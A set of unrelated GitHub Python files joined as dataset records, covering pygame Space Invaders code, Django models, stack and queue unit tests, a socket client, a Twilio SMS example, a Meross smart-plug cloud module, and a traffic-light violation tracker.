source)\n\nclass Spark(GEllipse):\n \"\"\"\n A class to represent particles created in shell explosions.\n \"\"\"\n # HIDDEN ATTRIBUTES\n # Attribute _vx: velocity in x direction\n # Invariant: _vx is a float\n #\n # Attribute _vy: velocity in y direction\n # Invariant: _vy is a float\n\n def __init__(self, x, y, color=WHITE_COLOR):\n \"\"\"\n Initializes a particle at (x,y) with random velocity and given color.\n\n Parameter x: the starting x-coordinate\n Precondition: x is a number (int or float)\n\n Parameter y: the starting y-coordinate\n Precondition: y is a number (int or float)\n\n Parameter color: the spark color\n Precondition: color is a valid color object or name (e.g. 
a string)\n \"\"\"\n super().__init__(x=x, y=y,\n width=PARTICLE_DIAMETER, height=PARTICLE_DIAMETER,\n fillcolor=color)\n self._vy = random.uniform(-MAX_INIT_VEL,MAX_INIT_VEL)\n self._vx = math.sqrt(MAX_INIT_VEL**2 - self._vy**2) * math.sin(random.uniform(0,2*math.pi))\n\n def move(self):\n \"\"\"\n Moves the spark by the current velocity\n \"\"\"\n self.x += self._vx\n self.y += self._vy\n self._vy += GRAVITY\n\nclass PowerUp(GImage):\n \"\"\"\n A class representing different power ups.\n\n The class will have different power ups including: ExtraLife\n \"\"\"\n # INSTANCE ATTRIBUTES:\n # Attribute _velocity: the velocity in y direction\n # Invariant: _velocity is an int or float\n\n def __init__(self, x):\n \"\"\"\n Initializes a game object powerup.\n \"\"\"\n source = 'heart.png'\n y = GAME_WIDTH - 100\n width = PUP_WIDTH\n height = PUP_HIEGHT\n super().__init__(x = x, y = y, width = width, height = height, source = source)\n\n def leftTopCorner(self):\n \"\"\"\n Returns the top left corner of the powerup object as a tuple.\n \"\"\"\n x = self.x - 1/2*self.width\n y = self.y + 1/2*self.height\n return (x,y)\n\n def rightTopCorner(self):\n \"\"\"\n Returns the top right corner of the powerup object as a tuple.\n \"\"\"\n x = self.x + 1/2*self.width\n y = self.y + 1/2*self.height\n return (x,y)\n\n def leftBottomCorner(self):\n \"\"\"\n Returns the bottom left corner of the powerup object as a tuple.\n \"\"\"\n x = self.x - 1/2*self.width\n y = self.y - 1/2*self.height\n return (x,y)\n\n def rightBottomCorner(self):\n \"\"\"\n Returns the bottom right corner of the powerup object as a tuple.\n \"\"\"\n x = self.x + 1/2*self.width\n y = self.y - 1/2*self.height\n return (x,y)\n","repo_name":"aashri-a/SpaceInvaders","sub_path":"invaders/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":16154,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"}{"seq_id":"35710030738","text":"import pygame\n\nfrom si_modules.player import Player\nfrom si_modules.enemy import Enemy\nfrom si_modules.settings import Settings\nfrom si_modules.game_stats import GameStats\nfrom si_modules.button import Button\nfrom si_modules.scoreboard import Scoreboard\n\nimport si_modules.game_functions as gf\n\n\nclass SpaceImpact():\n '''\n Class to represent spaceimpact game.\n '''\n def __init__(self):\n # create screen\n self.si_settings = Settings\n self.screen = pygame.display.set_mode(self.si_settings['screen_size'])\n\n # Title and icon\n pygame.display.set_caption(\"Space Impact\")\n icon = pygame.image.load(self.si_settings['game_icon'])\n pygame.display.set_icon(icon)\n\n\n # creating player and enemy \n self.player = Player(self.si_settings, self.screen)\n self.enemy = Enemy(self.si_settings, self.screen)\n\n # Make the Play and Restart button.\n self.play_button = Button(self.screen, \"PLAY\")\n self.restart_button = Button(self.screen, \"RESTART\")\n\n # Create instance to store game stats\n self.stats = GameStats(self.si_settings)\n self.sb = Scoreboard(self.si_settings, self.screen, self.stats)\n\n # set frames per second\n self.clock = pygame.time.Clock()\n\n\n def run(self):\n # game loop\n while True:\n self.clock.tick(30)\n\n gf.check_events(self)\n\n if self.stats.game_active:\n self.player.update()\n gf.update_enemy(self.player, self.enemy, self.stats)\n gf.update_bullets(self)\n\n gf.update_screen(self)\n\n\nif __name__ == \"__main__\":\n pygame.init()\n game = SpaceImpact()\n game.run()\n 
pygame.quit()\n","repo_name":"laraib07/SpaceImpact","sub_path":"SpaceImpact.py","file_name":"SpaceImpact.py","file_ext":"py","file_size_in_byte":1732,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"42025381401","text":"import datetime\n\nfrom django.db import models\n\nfrom applications.department.people.models import ServicedPerson, Visitor\n\n\nclass Leaving(models.Model):\n class Meta:\n abstract = True\n\n serviced_person = models.ForeignKey(to=ServicedPerson, on_delete=models.CASCADE, verbose_name=\"Обслуживаемый\")\n date_from = models.DateField(verbose_name=\"От\", default=datetime.datetime.now)\n date_to = models.DateField(verbose_name=\"До\", blank=True, null=True)\n commentary = models.TextField(verbose_name=\"Комментарий\", blank=True, null=True)\n\n def __str__(self):\n result = f\"{self.serviced_person} от {self.date_from}\"\n if self.date_to:\n result += f\" до {self.date_to}\"\n return result\n\n\nclass Travel(Leaving):\n class Meta:\n verbose_name = \"Поездка обслуживаемого\"\n verbose_name_plural = \"Поездки обслуживаемых\"\n\n visitor = models.ForeignKey(verbose_name=\"Родственник\", to=Visitor, blank=True, null=True,\n on_delete=models.SET_NULL)\n\n def __str__(self):\n result = \"Поездка \" + super().__str__()\n if self.visitor:\n result += f\" к {self.visitor}\"\n return result\n\n\nclass SickLeave(Leaving):\n class Meta:\n verbose_name = \"Больничный\"\n verbose_name_plural = \"Больничные\"\n\n diagnose = models.TextField(verbose_name=\"Диагноз\", blank=True, null=True)\n\n def __str__(self):\n result = \"Больничный \" + super().__str__()\n if self.diagnose and len(self.diagnose) < 15:\n result += f\" ({self.diagnose})\"\n return result\n","repo_name":"Kaper156/SocialHouse","sub_path":"SocialHouse/applications/receptionist/movements/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":1714,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"71566294508","text":"import unittest\r\n\r\nfrom queues import Queue, QueueUnderflowException\r\nfrom stack import Stack, StackPopException\r\n\r\n\r\nclass StackTestCase(unittest.TestCase):\r\n\r\n def test_is_empty(self):\r\n stack = Stack()\r\n assert stack.is_empty() is True\r\n\r\n stack.push(1)\r\n assert stack.is_empty() is False\r\n\r\n stack.pop()\r\n assert stack.is_empty() is True\r\n\r\n def test_size(self):\r\n stack = Stack()\r\n assert len(stack) == 0\r\n\r\n stack.push(1)\r\n assert len(stack) == 1\r\n\r\n stack.pop()\r\n assert len(stack) == 0\r\n\r\n def test_push_items(self):\r\n stack = Stack()\r\n\r\n tests = [1, '0', Stack, lambda x: x, {}, [], None]\r\n\r\n for test in tests:\r\n stack.add(test)\r\n\r\n assert len(tests) == len(stack)\r\n\r\n def test_pop_items(self):\r\n stack = Stack()\r\n\r\n with self.assertRaises(StackPopException):\r\n stack.pop()\r\n\r\n one = 1\r\n two = 2\r\n\r\n stack.push(one)\r\n stack.push(two)\r\n\r\n assert len(stack) == 2\r\n\r\n assert stack.pop() == two\r\n assert stack.pop() == one\r\n\r\n assert len(stack) == 0\r\n\r\n def test_print(self):\r\n stack = Stack()\r\n\r\n assert str(stack) == ''\r\n\r\n stack.push(3)\r\n stack.push(1)\r\n stack.push(2)\r\n\r\n assert str(stack) == '2 -> 1 -> 3'\r\n\r\n\r\n\r\nclass QueueTestCase(unittest.TestCase):\r\n\r\n def test_is_empty(self):\r\n queue = Queue()\r\n assert queue.is_empty() is True\r\n\r\n queue.enqueue(1)\r\n assert queue.is_empty() is False\r\n\r\n queue.dequeue()\r\n assert 
queue.is_empty() is True\r\n\r\n def test_size(self):\r\n queue = Queue()\r\n assert len(queue) == 0\r\n\r\n queue.enqueue(1)\r\n assert len(queue) == 1\r\n\r\n queue.dequeue()\r\n assert len(queue) == 0\r\n\r\n def test_enqueue(self):\r\n queue = Queue()\r\n\r\n tests = [1, '0', Queue, lambda x: x, {}, [], None]\r\n\r\n for test in tests:\r\n queue.enqueue(test)\r\n\r\n assert len(tests) == len(queue)\r\n\r\n def test_dequeue(self):\r\n queue = Queue()\r\n\r\n with self.assertRaises(QueueUnderflowException):\r\n queue.dequeue()\r\n\r\n one = 1\r\n two = 2\r\n\r\n queue.enqueue(one)\r\n queue.enqueue(two)\r\n\r\n assert len(queue) == 2\r\n\r\n assert queue.dequeue() == one\r\n assert queue.dequeue() == two\r\n\r\n assert len(queue) == 0\r\n\r\n def test_print(self):\r\n queue = Queue()\r\n\r\n assert str(queue) == ''\r\n\r\n queue.enqueue(3)\r\n queue.enqueue(1)\r\n \r\n\r\nif __name__ == '__main__':\r\n unittest.main()","repo_name":"By-Lucas/Tests-advanced-tests-Pytest-Unitest","sub_path":"tests.py","file_name":"tests.py","file_ext":"py","file_size_in_byte":2678,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"37"}{"seq_id":"17440209691","text":"#! /usr/bin/env python3\n\nimport os, sys\nimport socket\n\nHOST = ''\nPORT = 46777\n\noptions = { 1:\"What is your name?\",\n\t\t\t2:\"How do you know to respond to these questions?\",\n\t\t\t3:\"Can I ask you a personal question?\",\n\t\t\t4:\"Can you answer an arbitrary question?\",\n\t\t\t5:\"Thank you.\"\t\n}\n\n# create an INET, STREAMing socket\ns = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n\n# connect() expects a single (host, port) tuple\ns.connect((HOST, PORT))\n\nselection = 0\n\nwhile selection != 8:\n\tprint(\"What would you like to ask the server?\")\n\tprint(\"1. What is your name?\")\n\tprint(\"2. How do you know to respond to these questions?\")\n\tprint(\"3. Can I ask you a personal question?\")\n\tprint(\"4. Can you answer an arbitrary question?\")\n\tprint(\"5. Thank you.\")\n\n\t# Get user selection\n\tprint(\"Please enter a choice:\")\n\tselection = int(input())\n\tif selection not in range(1,6):\n\t\tprint(\"I do not understand your question. Please enter a number 1-5.\")\n\t\tbreak\n\n\t# Send choice to server\n\ts.send(bytearray(options[selection], 'utf8'))\n\tdata = s.recv(1024)\n\n\t# Print results\n\tprint(data.decode('utf8'))\n\tprint()\n\tbreak\n\ns.close()\n","repo_name":"mibeh/grab-bag","sub_path":"python_socket_example/client.py","file_name":"client.py","file_ext":"py","file_size_in_byte":1058,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"}{"seq_id":"71309039787","text":"# Download the helper library from https://www.twilio.com/docs/python/install\nimport os\nfrom twilio.rest import Client\nfrom dotenv import load_dotenv\nload_dotenv()\n\n\n# Find your Account SID and Auth Token at twilio.com/console\n# and set the environment variables. 
See http://twil.io/secure\naccount_sid = os.environ['TWILIO_ACCOUNT_SID']\nauth_token = os.environ['TWILIO_AUTH_TOKEN']\nclient = Client(account_sid, auth_token)\n\nmessage = client.messages \\\n .create(\n body=\"HELLO WORLD!\",\n from_=os.environ['FROM_NUMBER'],\n to=os.environ['TO_NUMBER']\n )\n\nprint(message.sid)\n","repo_name":"lem0n4id/LearnTwilio","sub_path":"send_sms.py","file_name":"send_sms.py","file_ext":"py","file_size_in_byte":660,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} +{"seq_id":"39394687672","text":"'''Crie um programa que leia o ano de nascimento de sete pessoas. No final, mostre quantas pessoas ainda não atingiram\na maioridade e quantas já são maiores'''\nprint('===='*10, ' EX054 ', '===='*10)\nfrom datetime import date\natual = date.today().year\np = 0\np2 = 0\nfor c in range(1, 8):\n data = int(input(\"Digite o ano de nascimento da {}º pessoa: \".format(c)))\n m = atual - data\n if m < 21:\n p += 1\n else:\n p2 += 1\n\nprint('Tem {} que não completaram a Maioridade!'.format(p))\nprint('Tem {} que já compeltaram a Maioridade!!'.format(p2))\n","repo_name":"JulliusCaesar/ExerciciosPyCharm","sub_path":"PythonExercicios/ex054.py","file_name":"ex054.py","file_ext":"py","file_size_in_byte":569,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"24566315530","text":"class dictionary_iter:\r\n def __init__(self, dic):\r\n self.dic = dic\r\n self.idx = 0\r\n def __iter__(self):\r\n return self\r\n\r\n def __next__(self):\r\n if self.idx > len(self.dic)-1:\r\n raise StopIteration\r\n result = list(self.dic.items())[self.idx]\r\n self.idx += 1\r\n return result\r\n\r\n\r\nresult = dictionary_iter({1: \"1\", 2: \"2\"})\r\nfor x in result:\r\n print(x)\r\n\r\nprint(20*'-')\r\n\r\nresult = dictionary_iter({\"name\": \"Peter\", \"age\": 24})\r\nfor x in result:\r\n print(x)\r\n\r\n\r\n\r\n\r\n\r\n\r\n","repo_name":"BatVanko/2_dictionary_iterator_iterators_and_generators_exercise","sub_path":"2_dictionary_iterator.py","file_name":"2_dictionary_iterator.py","file_ext":"py","file_size_in_byte":542,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"22800529752","text":"# -*- coding: utf-8 -*-\nimport terrariumLogging\nlogger = terrariumLogging.logging.getLogger(__name__)\n\nimport asyncio\nimport contextlib\nimport threading\n\nfrom time import sleep, time\n\nfrom terrariumUtils import terrariumCache, terrariumUtils, terrariumSingleton, terrariumAsync\n\n# pip install meross-iot\n# https://github.com/albertogeniola/MerossIot\nfrom meross_iot.http_api import MerossHttpClient\nfrom meross_iot.manager import MerossManager\nfrom meross_iot.controller.mixins.toggle import ToggleXMixin\nfrom meross_iot.model.http.exception import BadLoginException\nfrom meross_iot.model.exception import CommandTimeoutError\n\nclass TerrariumMerossCloud(terrariumSingleton):\n\n def __init__(self, username, password):\n start = time()\n self.__engine = { 'cache' : terrariumCache(), 'running': False, 'event': asyncio.Event() , 'asyncio' : terrariumAsync()}\n\n self._data = {}\n self._username = username\n self._password = password\n self._start()\n\n while not self.__engine['running']:\n logger.info('Waiting for Meross cloud connection ... ')\n sleep(1)\n\n logger.info(f'Meross cloud is connected! 
Found {len(self._data)} devices in {time()-start:.2f} seconds.')\n\n def _start(self):\n\n def _run():\n data = asyncio.run_coroutine_threadsafe(self._main_process(), self.__engine['asyncio'].async_loop)\n data.result()\n\n self.__engine['thread'] = threading.Thread(target=_run)\n self.__engine['thread'].start()\n\n def _store_data(self):\n for key in self._data:\n self.__engine['cache'].set_data(key, self._data[key],90)\n\n def scan_hardware(self,type):\n\n async def _scan_hardware(type):\n await self.manager.async_device_discovery()\n meross_devices = []\n if 'sensors' == type:\n meross_devices = self.manager.find_devices(device_type='ms100')\n elif 'relays' == type:\n meross_devices = self.manager.find_devices(device_class=ToggleXMixin)\n\n return meross_devices\n\n data = asyncio.run_coroutine_threadsafe(_scan_hardware(type), self.__engine['asyncio'].async_loop)\n devices = data.result()\n return devices\n\n def toggle_relay(self, device, switch, state):\n\n async def _toggle_relay(device, switch, state):\n device = self.manager.find_devices(device_uuids=[device])\n if len(device) == 1:\n device = device[0]\n\n if state != 0.0:\n await device.async_turn_on(channel=switch)\n else:\n await device.async_turn_off(channel=switch)\n\n return True\n\n return None\n\n data = asyncio.run_coroutine_threadsafe(_toggle_relay(device, switch, state), self.__engine['asyncio'].async_loop)\n result = data.result()\n return result\n\n def stop(self):\n logger.info('Stopping Meross cloud ... ')\n self.__engine['running'] = False\n self.__engine['event'].set()\n self.__engine['thread'].join()\n\n async def _main_process(self):\n\n # https://stackoverflow.com/a/49632779\n async def event_wait(evt, timeout):\n # suppress TimeoutError because we'll return False in case of timeout\n with contextlib.suppress(asyncio.TimeoutError):\n await asyncio.wait_for(evt.wait(), timeout)\n return evt.is_set()\n\n async def _notification(push_notification, target_devices):\n logger.info('Got an update from the Meross Cloud.')\n for device in target_devices:\n if hasattr(device,'is_on'):\n self._data[f'{device.uuid}'] = []\n\n for channel in device.channels:\n self._data[f'{device.uuid}'].append(device.is_on(channel=channel.index))\n\n if hasattr(device,'last_sampled_temperature'):\n self._data[f'{device.subdevice_id}'] = {\n 'temperature' : device.last_sampled_temperature,\n 'humidity' : device.last_sampled_humidity\n }\n\n self._store_data()\n\n try:\n # Setup the HTTP client API from user-password\n http_api_client = await MerossHttpClient.async_from_user_password(email=self._username, password=self._password)\n\n # Setup and start the device manager\n self.manager = MerossManager(http_client=http_api_client)\n await self.manager.async_init()\n\n # Discover devices.\n await self.manager.async_device_discovery()\n meross_devices = self.manager.find_devices()\n for dev in meross_devices:\n\n # Is a relay\n if hasattr(dev,'is_on'):\n await dev.async_update()\n self._data[f'{dev.uuid}'] = []\n\n for channel in dev.channels:\n self._data[f'{dev.uuid}'].append(dev.is_on(channel=channel.index))\n\n # Is a sensor\n if hasattr(dev,'last_sampled_temperature'):\n await dev.async_update()\n #print(f'Last data: {dev.last_sampled_time}')\n self._data[f'{dev.subdevice_id}'] = {\n 'temperature' : dev.last_sampled_temperature,\n 'humidity' : dev.last_sampled_humidity\n }\n\n self._store_data()\n self.__engine['running'] = True\n self.manager.register_push_notification_handler_coroutine(_notification)\n\n while not await 
event_wait(self.__engine['event'], 30):\n self._store_data()\n\n except CommandTimeoutError:\n logger.error(f'Meross communication timed out connecting with the server.')\n except BadLoginException:\n logger.error(f'Wrong login credentials for Meross. Please check your settings')\n\n finally:\n # Close the manager and logout from http_api\n self.manager.close()\n await http_api_client.async_logout()\n logger.info('Closed Meross cloud connection')","repo_name":"hortocam/TerrariumPI","sub_path":"terrariumCloud.py","file_name":"terrariumCloud.py","file_ext":"py","file_size_in_byte":5525,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"37"} +{"seq_id":"56036272","text":"import os\r\n\r\nfrom flask import Flask, abort, send_from_directory\r\nfrom jinja2.exceptions import TemplateNotFound\r\nimport csv\r\nfrom flaskr.charts import Charts\r\n\r\ndef read_data(app):\r\n data_file = os.path.join(app.root_path, 'data', 'cardio_train.csv')\r\n \r\n with open(data_file) as csvfile:\r\n reader = csv.reader(csvfile, delimiter=';')\r\n headers = next(reader) # Read the first row as headers\r\n\r\n charts = Charts()\r\n for row in reader:\r\n datapoint = {}\r\n for i, header in enumerate(headers):\r\n datapoint[header] = row[i]\r\n charts.aggregate(datapoint)\r\n\r\n charts.plot()\r\n return charts \r\n\r\ndef create_app():\r\n app = Flask(__name__)\r\n charts = read_data(app)\r\n\r\n @app.route('/charts/')\r\n def get_chart_list():\r\n return list(charts.names())\r\n \r\n @app.route('/charts/<name>')\r\n def get_chart(name):\r\n plot_config = charts.get(name)\r\n if plot_config is None:\r\n abort(404)\r\n return plot_config\r\n\r\n @app.route('/')\r\n @app.route('/<path>.html')\r\n def pages(path=None):\r\n if path is None:\r\n path = \"index\"\r\n try:\r\n return send_from_directory('pages', path + \".html\")\r\n except TemplateNotFound:\r\n abort(404)\r\n return app","repo_name":"cathyQinQin/cardiovasular-disease-data-visualization","sub_path":"flaskr/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":1341,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"7641553827","text":"import cv2\nfrom primitives import constants\nimport numpy as np\n\nfrom copy import deepcopy\nfrom enum import IntEnum\n\nfrom primitives.coordinates import Coordinates\nfrom primitives.enums import Mode\nfrom primitives.line import ransac, Line, SamePointError\nfrom pipeline.base.pipeline import is_frequency, ThreadedPipeBlock\nfrom pipeline.traffic_light_observer import Color\n\n\nclass CarBehaviourMode(IntEnum):\n NORMAL = 1\n LINE_CROSSED = 2\n RED_DRIVER = 3\n ORANGE_DRIVER = 4\n\n\nclass Box2D:\n \"\"\"\n Bounding box around car.\n Holds printable information about car and its behavior classification in video.\n \"\"\"\n\n def __init__(self, car_id):\n self._top_left = None\n self._bottom_right = None\n self._car_id = car_id\n self._red_distance_traveled = 0\n\n self._behaviour = CarBehaviourMode.NORMAL\n\n self._lifetime = 1\n self._history = []\n\n @property\n def behaviour(self):\n \"\"\"\n :return: behaviour classification\n \"\"\"\n return self._behaviour\n\n @property\n def top_left(self):\n \"\"\"\n :return: coordinates top left corner of bounding box\n \"\"\"\n\n return self._top_left\n\n @property\n def bottom_right(self):\n \"\"\"\n :return: coordinates of bottom right corner of bounding box\n \"\"\"\n\n return self._bottom_right\n\n @property\n def car_id(self):\n \"\"\"\n :return: car id 
observed by this bounding box\n        \"\"\"\n\n        return self._car_id\n\n    @property\n    def initialized(self):\n        \"\"\"\n        :return: whether the bounding box is set\n        \"\"\"\n\n        return self._top_left is not None\n\n    @property\n    def lifetime(self):\n        \"\"\"\n        :return: lifetime of this bounding box.\n        \"\"\"\n\n        return self._lifetime\n\n    @property\n    def tracker_point(self):\n        \"\"\"\n        :return: coordinates of tracker point - center of bounding box bottom line\n        \"\"\"\n\n        return Coordinates((self._bottom_right[0] + self._top_left[0]) / 2, self._bottom_right[1])\n\n    @property\n    def front_point(self):\n        \"\"\"\n        :return: coordinates of front point - center of bounding box top line\n        \"\"\"\n\n        return Coordinates((self._bottom_right[0] + self._top_left[0]) / 2, self._top_left[1])\n\n    @property\n    def center_point(self):\n        \"\"\"\n        :return: center point of bounding box\n        \"\"\"\n\n        return Coordinates((self._bottom_right[0] + self._top_left[0]) / 2, (self._bottom_right[1] + self._top_left[1]) / 2)\n\n    def get_corridor(self, info):\n        \"\"\"\n        Returns ID of the corridor in which the tracked point of this bounding box lies\n\n        :param info: instance of InputInfo used for getting corridor repository references\n        :return: id of corridor\n        \"\"\"\n\n        return info.corridors_repository.get_corridor(self.tracker_point)\n\n    def distance_from_vanishing_point(self, info):\n        \"\"\"\n        :param info: instance of InputInfo used for getting vanishing point references\n        :return: distance from vanishing point in pixels\n        \"\"\"\n        return info.vp1.coordinates.distance(self.tracker_point)\n\n    def tic(self):\n        \"\"\"\n        On each frame, 1 is subtracted from the bounding box lifetime\n        \"\"\"\n        self._lifetime -= 1\n\n    def update(self, anchors, lights_state, info, velocity):\n        \"\"\"\n        Updates position, velocity and behaviour depending on the passed light state.\n        On each update the history of center points is saved for trajectory printing.\n\n        :param anchors: new anchor position\n        :param lights_state: current light state\n        :param info: instance of InputInfo\n        :param velocity: velocity of observed car\n        :return: classification of the car's behaviour\n        \"\"\"\n        previous_coordinates = None\n\n        if self.initialized:\n            previous_coordinates = self.tracker_point\n\n        self._top_left, self._bottom_right, _ = anchors\n        self._lifetime += 1\n\n        if previous_coordinates is not None:\n            if lights_state == Color.RED or lights_state == Color.RED_ORANGE:\n                if info.corridors_repository.line_crossed(previous_coordinates, self.tracker_point):\n                    self._behaviour = CarBehaviourMode.RED_DRIVER\n\n                if self._behaviour == CarBehaviourMode.LINE_CROSSED:\n                    self._red_distance_traveled += velocity\n\n            if lights_state == Color.ORANGE:\n                if info.corridors_repository.line_crossed(previous_coordinates, self.tracker_point):\n                    self._behaviour = CarBehaviourMode.ORANGE_DRIVER\n\n            if lights_state == Color.GREEN and self._behaviour not in [CarBehaviourMode.ORANGE_DRIVER, CarBehaviourMode.RED_DRIVER]:\n                if info.corridors_repository.line_crossed(previous_coordinates, self.tracker_point):\n                    self._behaviour = CarBehaviourMode.LINE_CROSSED\n\n        if not len(self._history) or np.abs(self.center_point.y - self._history[-1].y) > 20:\n            self._history.append(self.center_point)\n\n        return self._behaviour\n\n    def draw_boxes(self, image):\n        \"\"\"\n        Helper method for drawing the bounding box with a color corresponding to behaviour\n\n        :param image: selected image to draw on\n        :return: updated image\n        \"\"\"\n\n        if self._behaviour == CarBehaviourMode.RED_DRIVER:\n            color = constants.COLOR_RED\n        elif self._behaviour == 
CarBehaviourMode.ORANGE_DRIVER:\n            color = constants.COLOR_ORANGE\n        else:\n            color = constants.COLOR_GREEN\n\n        cv2.rectangle(img=image,\n                      pt1=self._top_left,\n                      pt2=self._bottom_right,\n                      color=color,\n                      thickness=constants.OBSERVER_BOX_THICKNESS)\n\n        cv2.rectangle(img=image,\n                      pt1=self._top_left,\n                      pt2=(self._top_left[0] + 30, self._top_left[1] - 15),\n                      color=color,\n                      thickness=constants.FILL)\n\n        cv2.circle(img=image,\n                   center=self.tracker_point.tuple(),\n                   color=constants.COLOR_RED,\n                   radius=5,\n                   thickness=constants.FILL)\n\n        cv2.putText(img=image,\n                    text=self.car_id,\n                    org=self._top_left,\n                    fontFace=1,\n                    fontScale=1,\n                    color=constants.COLOR_BLACK,\n                    thickness=2)\n\n        return image\n\n    def draw_trajectories(self, image, method=\"second\"):\n        \"\"\"\n        Helper method for drawing car trajectories (trajectories of center point)\n\n        :param image: selected image\n        :param method: method used to obtain the trajectory to be drawn\n        :return: updated image\n        \"\"\"\n\n        if method == \"second\":\n            for index, point in enumerate(self._history):\n                cv2.circle(img=image,\n                           center=point.tuple(),\n                           color=constants.COLOR_BLUE,\n                           radius=5,\n                           thickness=constants.FILL)\n\n                try:\n                    cv2.line(img=image,\n                             pt1=point.tuple(),\n                             pt2=self._history[index + 1].tuple(),\n                             color=constants.COLOR_BLUE,\n                             thickness=2)\n\n                except IndexError:\n                    pass\n\n        if method == \"first\":\n            try:\n                Line(self._history[0].tuple(), self._history[-1].tuple()).draw(image, constants.COLOR_RED, 1)\n            except SamePointError:\n                return\n\n            cv2.circle(img=image,\n                       center=self._history[0].tuple(),\n                       color=constants.COLOR_BLUE,\n                       radius=5,\n                       thickness=constants.FILL)\n\n            cv2.circle(img=image,\n                       center=self._history[-1].tuple(),\n                       color=constants.COLOR_BLUE,\n                       radius=5,\n                       thickness=constants.FILL)\n\n            cv2.line(img=image,\n                     pt1=self._history[0].tuple(),\n                     pt2=self._history[-1].tuple(),\n                     color=constants.COLOR_BLUE,\n                     thickness=2)\n\n            position_history = [coordinates.tuple() for coordinates in self._history]\n            line, value = ransac(position_history, position_history, 1)\n\n            if line is not None and value > 5:\n                line.draw(image, constants.COLOR_RED, 2)\n\n    def __str__(self):\n        return f\"[Box id: {self._car_id}]\"\n\n\nclass BBoxRepository:\n    \"\"\"\n    Bounding boxes repository.\n    Holds all instances of bounding boxes in separate dictionaries\n    \"\"\"\n\n    def __init__(self):\n        self._boxes = {}\n        self._red_riders = {}\n        self._orange_riders = {}\n        self._all_cars = {}\n\n    @property\n    def boxes(self):\n        \"\"\"\n        :return: all bounding boxes\n        \"\"\"\n\n        return self._boxes\n\n    @property\n    def red_riders(self):\n        \"\"\"\n        :return: all red drivers\n        \"\"\"\n\n        return self._red_riders\n\n    @property\n    def orange_riders(self):\n        \"\"\"\n        :return: all orange drivers\n        \"\"\"\n\n        return self._orange_riders\n\n    @property\n    def car_count(self):\n        \"\"\"\n        :return: total car count\n        \"\"\"\n\n        return len(self._all_cars)\n\n    @property\n    def red_drivers_count(self):\n        \"\"\"\n        :return: number of red drivers\n        \"\"\"\n\n        return len(self._red_riders)\n\n    @property\n    def orange_drivers_count(self):\n        \"\"\"\n        :return: orange drivers count\n        \"\"\"\n\n        return len(self._orange_riders)\n\n    def get_boxes_in_corridors(self, info):\n        \"\"\"\n        :param info: instance of InputInfo used for corridor assigning\n        :return: dictionary of assigned bounding boxes to corresponding traffic corridors\n        \"\"\"\n\n        if info.vp1 is None or not info.corridors_repository.corridors_found:\n            return {}\n\n        corridor_ids = info.corridors_repository.corridor_ids\n        sorted_boxes = sorted(self._boxes.values(), key=lambda b: 
b.distance_from_vanishing_point(info))\n\n        return {corridor: [box for box in sorted_boxes if box.get_corridor(info) == corridor] for corridor in corridor_ids}\n\n    def insert_or_update(self, anchors, car_id, velocity, lights_state, info, seq):\n        \"\"\"\n        Updates or creates a new instance of bounding box identified by car ID.\n        If a red or orange driver is detected, its instance is saved into the corresponding dictionary\n\n        :param anchors: anchor points of observed car box\n        :param car_id: unique car id\n        :param velocity: velocity of car\n        :param lights_state: current light state\n        :param info: instance of InputInfo for behaviour classification\n        :param seq: current sequence number\n        \"\"\"\n\n        if car_id not in self._boxes:\n            self._boxes[car_id] = Box2D(car_id)\n\n        behaviour = self._boxes[car_id].update(anchors, lights_state, info, velocity)\n\n        if behaviour in [CarBehaviourMode.ORANGE_DRIVER, CarBehaviourMode.RED_DRIVER, CarBehaviourMode.LINE_CROSSED]:\n            if car_id not in self._all_cars:\n                self._all_cars[car_id] = seq\n\n        if behaviour == CarBehaviourMode.RED_DRIVER:\n            try:\n                self._orange_riders.pop(car_id)\n            except KeyError:\n                pass\n\n            if car_id not in self._red_riders:\n                self._red_riders[car_id] = seq\n\n        if behaviour == CarBehaviourMode.ORANGE_DRIVER:\n            if car_id not in self._orange_riders:\n                self._orange_riders[car_id] = seq\n\n    def check_lifetime(self):\n        \"\"\"\n        Controls the lifetime of all bounding boxes; if any of them has a lifetime below 0 it has not been updated for a while\n        -> it is removed from the observed bounding boxes\n        \"\"\"\n\n        for key, box in self._boxes.copy().items():\n            box.tic()\n            if box.lifetime < 0:\n                self._boxes.pop(key)\n\n    def draw_boxes(self, image):\n        \"\"\"\n        Helper function for drawing all present boxes on image\n\n        :param image: selected image to draw on\n        :return: updated image\n        \"\"\"\n\n        for key, box in self._boxes.items():\n            box.draw_boxes(image)\n\n        return image\n\n    def draw_trajectories(self, image):\n        \"\"\"\n        Helper function for drawing all trajectories of all center points of observed bounding boxes\n\n        :param image: selected image\n        :return: updated image\n        \"\"\"\n\n        image = cv2.cvtColor(image, cv2.COLOR_RGB2GRAY)\n        image = cv2.cvtColor(image, cv2.COLOR_GRAY2RGB)\n\n        for key, box in self._boxes.items():\n            box.draw_trajectories(image)\n\n        return image\n\n    def get_box_by_id(self, car_id):\n        \"\"\"\n        :param car_id: desired car ID\n        :return: instance of bounding box with desired ID\n        \"\"\"\n\n        return self._boxes[car_id]\n\n    def draw_statistics(self, image, info):\n        \"\"\"\n        Helper function to draw a statistics panel about passed cars on the selected image\n\n        :param image: selected image\n        :param info: instance of InputInfo\n        :return: updated image\n        \"\"\"\n\n        statistics_panel = np.full(shape=(30, info.width, 3),\n                                   dtype=np.uint8,\n                                   fill_value=constants.COLOR_WHITE)\n\n        cv2.putText(img=statistics_panel,\n                    text=f\"Total car count: {self.car_count}\",\n                    org=(10, 20),\n                    fontFace=1,\n                    